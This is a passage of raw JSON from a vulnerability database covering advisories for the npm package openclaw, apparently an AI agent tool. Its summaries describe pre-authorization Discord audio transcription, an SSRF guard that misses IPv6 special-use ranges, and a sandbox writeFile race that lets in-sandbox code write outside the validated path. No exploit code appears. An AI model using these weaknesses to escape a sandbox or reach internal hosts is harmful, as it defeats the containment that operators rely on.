5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"}],"aliases":["GHSA-v3qc-wrwx-j3pw"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulne
rablecode.io/vulnerabilities/VCID-atn7-pn13-3fgb"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89019?format=json","vulnerability_id":"VCID-axp9-mt9z-gkgw","summary":"OpenClaw runs Discord audio preflight transcription before member authorization\n## Summary\nDiscord audio preflight transcription before member authorization\n\n## Current Maintainer Triage\n- Status: narrow\n- Normalized severity: medium\n- Assessment: v2026.3.28 still runs Discord audio preflight before member allowlist rejection, but this is the same pre-auth resource-consumption class and not the high-severity auth-bypass framing in the draft.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `ee52f64226a03efadfdf1e3b759e13424a3d4e41` — 2026-03-30T14:38:22+01:00\n\nOpenClaw thanks @AntAISecurityLab for 
reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41374","reference_id":"","reference_type":"","scores":[{"value":"0.00081","scoring_system":"epss","scoring_elements":"0.24049","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00081","scoring_system":"epss","scoring_elements":"0.23978","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00081","scoring_system":"epss","scoring_elements":"0.24032","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41374"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/ee52f64226a03efadfdf1e3b759e13424a3d4e41","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/ee52f64226a03efadfdf1e3b759e13424a3d4e41"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring
_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-hhff-fj5f-qg48","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-hhff-fj5f-qg48"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41374","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41374"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-resource-consumption-via-discord-audio-preflight-before-member-authorization","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-resource-consumption-via-discord-audio-preflight-before-member-authorization"},{"reference_url":"https://github.com/advisories/GHSA-hhff-fj5f-qg48","reference_id":"GHSA-hhff-fj5f-qg48","reference_type":"","scores":[{"value":"MODERATE","scoring_sys
tem":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-hhff-fj5f-qg48"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109907?format=json","purl":"pkg:npm/openclaw@2026.3.31","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch
"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej
"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"}],"aliases":["CVE-2026-41374","GHSA-hhff-fj5f-qg48"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-axp9-mt9z-gkgw"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91346?format=json","vulnerability_id":"VCID-aye6-1fwu-nkc5","summary":"OpenClaw SSRF guard misses four IPv6 special-use ranges\n## Summary\n\nThe SSRF/IP classifier treated several IPv6 special-use ranges as public and allowed fetches to proceed.\n\n## Impact\n\nAn attacker who controlled a fetched URL could target internal or non-routable IPv6 addresses that should have been blocked by the SSRF guard.\n\n## Affected Component\n\n`src/shared/net/ip.ts, src/infra/net/ssrf.*`\n\n## Fixed Versions\n\n- Affected: `<= 2026.3.24`\n- Patched: `>= 2026.3.28`\n- Latest stable `2026.3.28` contains the fix.\n\n## Fix\n\nFixed by commit `d61f8e5672` (`Net: block missing IPv6 special-use ranges`).\n\nOpenClaw thanks @nicky-cc  of Tencent zhuque Lab [https://github.com/Tencent/AI-Infra-Guard](https://github.com/Tencent/AI-Infra-Guard) for 
reporting.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"3.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/d61f8e56723e03573b847422468d99c44c26e34f","reference_id":"","reference_type":"","scores":[{"value":"3.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/d61f8e56723e03573b847422468d99c44c26e34f"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-g86v-f9qv-rh6m","reference_id":"","reference_type":"","scores":[{"value":"3.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N"},{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-g86v-f9qv-rh6m"},{"reference_url":"https://github.com/advisories/GHSA-g86v-f9qv-rh6m","reference_id":"GHSA-g86v-f9qv-rh6m","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-g86v-f9qv-rh6m"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109863?format=json","purl":"pkg:npm/openclaw@2026.3.28","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{
"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{
"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{
"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"}],"aliases":["GHSA-g86v-f9qv-rh6m"],"risk_score":1.4,"exploitability":"0.5","weighted_severity":"2.8","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-aye6-1fwu-nkc5"},{"url
":"http://public2.vulnerablecode.io/api/vulnerabilities/90794?format=json","vulnerability_id":"VCID-b7hq-mrhg-b3bk","summary":"OpenClaw: Sandbox `writeFile` commit could race outside the validated path\n## Summary\nIn affected versions of `openclaw`, the sandbox fs-bridge `writeFile` commit step used an unanchored container path during the final move into place. An attacker racing parent-path changes inside the sandbox could redirect the committed file outside the validated sandbox path.\n\n## Impact\nThis is a sandbox boundary bypass. In-sandbox code could win a time-of-check-time-of-use race and cause host-approved `writeFile` operations to land outside the validated writable path within the container mount namespace.\n\n## Affected Packages and Versions\n- Package: `openclaw` (npm)\n- Affected versions: `< 2026.3.11`\n- Fixed in: `2026.3.11`\n\n## Technical Details\nThe hardening work for anchored remove, rename, and mkdir operations did not fully cover the `writeFile` commit path. The final `mv` still used the raw target path, leaving a race window between safety revalidation and the in-container commit step.\n\n## Fix\nOpenClaw now anchors the `writeFile` commit path to the canonical parent directory before the final move. 
The fix shipped in `openclaw@2026.3.11`.\n\n## Workarounds\nUpgrade to `2026.3.11` or later.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-32977","reference_id":"","reference_type":"","scores":[{"value":"0.00015","scoring_system":"epss","scoring_elements":"0.0317","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00015","scoring_system":"epss","scoring_elements":"0.03265","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00015","scoring_system":"epss","scoring_elements":"0.03256","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-32977"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.11","reference_id":"","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.11"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-xvx8-77m6-gwg6","reference_id":"","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-31T13:28:14Z
/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-xvx8-77m6-gwg6"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32977","reference_id":"","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32977"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-sandbox-boundary-bypass-via-unanchored-writefile-commit-path","reference_id":"","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H"},{"value":"5.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-31T13:28:14Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-sandbox-boundary-bypass-via-unanchored-writefile-commit-path"},{"reference_url":"https://github.com/advisories/GHSA-xvx8-77m6-gwg6","reference_id":"GHSA-xvx8-77m6-gwg6","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-xvx8-77m6-gwg6"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74883?format=json","purl":"pkg:npm/openclaw@2026.3.11","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerabil
